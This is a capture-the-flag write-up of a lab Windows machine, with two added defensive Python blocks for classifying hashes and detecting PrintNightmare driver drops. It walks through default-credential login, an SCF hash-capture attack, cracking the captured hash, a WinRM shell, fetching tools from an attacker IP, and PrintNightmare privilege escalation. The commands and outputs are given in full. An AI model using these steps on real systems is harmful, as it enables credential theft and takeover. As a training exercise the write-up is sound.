Overview
To cut a long story short, this is a Windows machine whose web page sits behind guessable credentials. Behind the login is a file-upload portal that can be used to trigger an SCF file attack, which in turn granted us a shell via WinRM. From there, a vulnerable printing service let us escalate to an Administrator shell.
I. Scanning
So basically, it’s a Windows box with SMB shares and an HTTP port open.
# Nmap 7.92 scan initiated Thu Feb 3 21:46:00 2022 as: nmap -sC -sV -p- -oN nmap-fullports.txt driver.htb
Nmap scan report for driver.htb
Host is up (0.039s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-04T09:47:57
|_ start_date: 2022-02-03T15:59:59
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 7 21:48:32 2022 -- 1 IP address (1 host up) scanned in 151.91 seconds
Just don’t forget to scan all ports (with the -p- switch) in order not to miss port 5985.
Upon opening the web page, the site asked for HTTP Basic Authentication.
II. Failed enumeration attempts
At first glance, I didn’t bother with the login form and looked for other endpoints instead. However, looking at the Gobuster scan result:
# Port 80 scan result
/images (Status: 403) [Size: 1233]
/%c3%90%c2%a0%c3%91%c2%83%c3%91%c2%81%c3%91%c2%81%c3%90%c2%ba%c3%90%c2%b8%c3%90%c2%b9%c3%90%c2%9f%c3%90%c2%b8%c3%91%c2%82%c3%90%c2%be%c3%90%c2%bd (Status: 400) [Size: 324]
/%20%09adobe%20photoshop%20elements%205 (Status: 400) [Size: 324]
/%09tuneup (Status: 400) [Size: 324]
/alcohol120%1952722c (Status: 400) [Size: 324]
And dirbuster result:
… eventually, I gave up on this attack vector. Then I went to SMB and tried my luck on it.
┌──(kali㉿kali)-[~/ctf/htb/Driver]
└─$ smbclient --no-pass -L //10.10.11.106
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/ctf/htb/Driver]
└─$ smbclient -U guest -L //10.10.11.106/
Enter WORKGROUP\guest password:
session setup failed: NT_STATUS_ACCOUNT_DISABLED
To my surprise, the guest account was disabled and anonymous access was denied, even though this is supposed to be an easy box. Placing a bet on the outdated software + public exploits combo also turned out to be a mistake shortly after:
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > exploit
[*] Started reverse TCP handler on 10.10.14.8:9999
[*] 10.10.11.106:445 - Running automatic check ("set AutoCheck false" to disable)
[-] 10.10.11.106:445 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
# From https://github.com/ZecOps/CVE-2020-0796-RCE-POC
$ python3 SMBleedingGhost.py 10.10.11.106 10.10.14.8 8080
CVE-2020-0796 Remote Code Execution POC
(c) 2020 ZecOps, Inc.
Target is not vulnerable
Some other enumeration attempts I learnt from HackTricks also fell short, as they returned no new information.
III. Successful enumeration attempts
Afterwards, somehow I followed my nose and randomly typed admin / password into the HTTP Basic login prompt, as well as admin / pass. On the third attempt, with admin / admin, it happily got me through:
Next, I maniacally clicked on whatever seemed clickable. In spite of that, there was nothing but this firmware update page:
Through Burp Suite, the page appeared to be a rudimentary file-upload page, a direct HTTP POST request with no validation whatsoever. Wappalyzer suggested a PHP backend, so I tried a PHP reverse shell along with some other web payloads and Windows payloads. Nonetheless, nothing worked, which compelled us to seek a better attack vector.
But hold on, files, with SMB… At that moment, my mind finally pieced the clues together and the answer suddenly dawned on me: how about an SCF file attack?
This straight-to-the-point guide from Pentestlab covered all the knowledge needed to start exploiting the vulnerability. Thus, strictly following the guide, we got some sweet hashes like this:
msf6 auxiliary(server/capture/smb) > exploit
[*] Auxiliary module running as background job 1.
[*] Server is running. Listening on 10.10.14.21:445
msf6 auxiliary(server/capture/smb) >
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:7dddc33ef0e24ca4:0365b04698b0c7b26f59c27bd7ceae61:…
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:e6fbeb49363872ac:cc3944c26e2cb37a604ed94691a61e3a:…
# and several more that look pretty much alike
Because I didn’t know which one was the “legitimate” hash, I used some small scripting tricks to dump them all into separate files, so as to check them using hashid.
┌──(kali㉿kali)-[~/ctf/htb/Driver]
└─$ hashid userhash
--File 'userhash'--
Analyzing 'tony::DRIVER:7dddc33ef0e24ca4:0365b04698b0c7b26f59c27bd7ceae61:0101000000000000007e17dbda1bd801835bdaa9e8a14d09000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000'
[+] NetNTLMv2
Analyzing '400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800007e17dbda1bd8010600040002000000080030003000000000000000000000000020000060482ada3a682ca5c10eedb3a409d998e199cf3efff574506cf644e8c94799160a00100'
[+] Unknown hash
Analyzing '0000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003100000000000000000000000000'
[+] Unknown hash
--End of file 'userhash'--
┌──(kali㉿kali)-[~/ctf/htb/Driver]
└─$ hashid userhash2
--File 'userhash2'--
Analyzing <REDACTED>
[+] NetNTLMv2
--End of file 'userhash2'--
IV. Foothold
You will miss all the fun if I give away all the real credentials. For that reason, critical credentials will be redacted from this point onwards.
The question is, where to use all these hashes? An obvious answer is the WinRM port, 5985.
The next question would be, “how”? Well, let’s go for a must-have tool: evil-winrm. Installation instructions are clearly put across in its README file, so I’ll not go into details here.
Checking the options evil-winrm provides, there’s a -H switch to log in with an NTLM hash. However…
$ evil-winrm -i driver.htb -u tony -H "<REDACTED_LEGITIMATE_HASH>"
Evil-WinRM shell v3.3
Error: Invalid hash format
It didn’t work, and god knows why. Consequently, there was no avoiding the hassle of cracking this hash on my potato machine. Thankfully the hash didn’t take donkey’s years to crack.
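Two things in the last two sections have the same explanation. The hashid run above split one NetNTLMv2 line into three fragments (hence the two “Unknown hash” verdicts), and evil-winrm’s -H switch expects a 32-hex-character NT hash usable for pass-the-hash, not a NetNTLMv2 challenge/response, which is bound to the server challenge and can only be cracked offline. The following Python is an added example, not part of the write-up or of any tool named here; the sample line is constructed and assumes the user::DOMAIN:challenge:proof:blob layout printed by Metasploit’s capture module.

```python
import re

# Constructed sample in the "user::DOMAIN:challenge:proof:blob" layout that
# Metasploit's capture/smb module prints; the hex is made up, not the box's.
SAMPLE_LINE = ("alice::CORP:0123456789abcdef:"
               "00112233445566778899aabbccddeeff:"
               "0101000000000000" + "a0" * 40)
# The same value after a terminal wrapped it, which is what produced the
# "Unknown hash" verdicts in the hashid run above.
WRAPPED = [SAMPLE_LINE[:60], SAMPLE_LINE[60:110], SAMPLE_LINE[110:]]

NETNTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]+):(?P<challenge>[0-9a-fA-F]{16}):"
    r"(?P<proof>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$")
NT_HASH_RE = re.compile(r"^[0-9a-fA-F]{32}$")


def reassemble(fragments):
    """Join a value that was wrapped onto several lines back into one."""
    return "".join(f.strip() for f in fragments)


def classify(value):
    """'nt-hash' is what evil-winrm -H expects (pass-the-hash); 'netntlmv2'
    is a one-time challenge/response bound to the server challenge, so it
    can only be cracked offline, never replayed."""
    if NT_HASH_RE.match(value):
        return "nt-hash"
    if NETNTLMV2_RE.match(value):
        return "netntlmv2"
    return "unknown"


def parse_netntlmv2(value):
    """Split a complete NetNTLMv2 line into its fields, rejecting fragments."""
    m = NETNTLMV2_RE.match(value)
    if not m:
        raise ValueError("not a complete NetNTLMv2 line (wrapped or cut?)")
    blob = m.group("blob").lower()
    # The blob is the NTLMv2 client challenge structure; it opens with
    # RespType=1, HiRespType=1 and six reserved zero bytes: 0101000000000000.
    if not blob.startswith("0101000000000000"):
        raise ValueError("blob lacks the NTLMv2 response header")
    return {"user": m.group("user"), "domain": m.group("domain"),
            "server_challenge": m.group("challenge").lower(),
            "nt_proof": m.group("proof").lower(), "blob": blob}
```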
$ john userhash2
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
<REDACTED_TONY_PASSWORD> (tony)
1g 0:00:02:44 DONE 3/3 (2022-02-07 01:43) 0.006064g/s 957216p/s 957216c/s 957216C/s labzter..lilton3
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
With the password now in hand, getting a shell callback is a piece of cake.
$ evil-winrm -i driver.htb -u tony -p <REDACTED_TONY_PASSWORD>
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
And the rock-stable shell of evil-winrm easily led me to the user flag:
*Evil-WinRM* PS C:\Users\tony\Desktop> Get-ChildItem
Directory: C:\Users\tony\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/7/2022 5:21 AM 34 user.txt
V. Privilege Escalation
First and foremost, WinPEAS all the way.
On our attacker machine:
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220206/winPEASany.exe -O finding.exe
On the remote shell:
Invoke-WebRequest -URI http://10.10.14.21/finding.exe -UseBasicParsing -OutFile finding.exe
Carefully examining the WinPEAS result, not many exceptional things showed up, but the most notable one is probably a running service named spoolsv.exe.
In short, spoolsv signifies the existence of a printer and printing drivers, which reminds us of the unforgettable PrintNightmare, a vulnerability chain comprising CVE-2021-34527, CVE-2021-34481 (for RCE) and CVE-2021-1675 (for local privilege escalation). Unquestionably, we will use the last one.
A quick GitHub search led me to a C# PoC that seemed to work.
However, its setup called for an abundance of time, so I gave it a miss and tried this simple script instead.
Without further ado, I straightforwardly followed the README and it smoothly did the trick.
*Evil-WinRM* PS C:\Users\tony\Downloads> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
At that point, what was left was to log in using the adm1n account (which has Administrator privileges) and snatch the flag.
evil-winrm -i driver.htb -u adm1n -p P@ssw0rd
The root flag can be found effortlessly in Administrator’s Desktop folder.
*Evil-WinRM* PS C:\Users\Administrator> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/8/2022 5:04 AM 34 root.txt
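A defender-side counterpart to the escalation above, added here and not part of the write-up or of Invoke-Nightmare: the Invoke-Nightmare output shows the payload DLL created in the user’s Temp folder and then handed to the spooler as a printer driver, and the spooler copies such files into its own driver directory before loading them. Correlating a DLL written to a user-writable location with spoolsv.exe writing a file of the same name under \spool\drivers\ shortly afterwards is therefore a simple detection. The records below are constructed in the shape of Sysmon Event ID 11 (FileCreate) fields with second-granularity timestamps; they are not telemetry from the box.

```python
import ntpath

# Constructed records shaped like Sysmon Event ID 11 (FileCreate) fields;
# not real telemetry. "t" is a timestamp in seconds for simplicity.
SAMPLE_EVENTS = [
    {"t": 100, "User": r"DRIVER\tony",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\tony\AppData\Local\Temp\nightmare.dll"},
    {"t": 103, "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\spoolsv.exe",
     "TargetFilename": r"C:\Windows\System32\spool\drivers\x64\3\nightmare.dll"},
    {"t": 500, "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\spoolsv.exe",
     "TargetFilename": r"C:\Windows\System32\spool\drivers\x64\3\mxdwdrv.dll"},
]

SPOOL_DRIVER_DIR = "\\spool\\drivers\\"
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")


def _norm(path):
    return path.replace("/", "\\").lower()


def find_driver_dll_drops(events, window=60):
    """Flag a DLL that a non-spooler process wrote to a user-writable place
    and that spoolsv.exe then wrote under the spool driver directory within
    `window` seconds. Returns (dll name, staging user, spooler path)."""
    staged = {}  # dll basename -> (t, user, path) of the user-land write
    hits = []
    for ev in sorted(events, key=lambda e: e["t"]):
        path = _norm(ev["TargetFilename"])
        name = ntpath.basename(path)
        if not name.endswith(".dll"):
            continue
        image = ntpath.basename(_norm(ev["Image"]))
        if image != "spoolsv.exe" and any(p in path for p in USER_WRITABLE):
            staged[name] = (ev["t"], ev["User"], path)
        elif image == "spoolsv.exe" and SPOOL_DRIVER_DIR in path:
            prev = staged.get(name)
            if prev and ev["t"] - prev[0] <= window:
                hits.append((name, prev[1], ev["TargetFilename"]))
    return hits
```

The last record, an unrelated DLL in the driver directory with no preceding user-land write, is deliberately not flagged, which keeps routine driver updates out of the alert.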
And that’s all. Hope you’ve enjoyed this vastly informative box.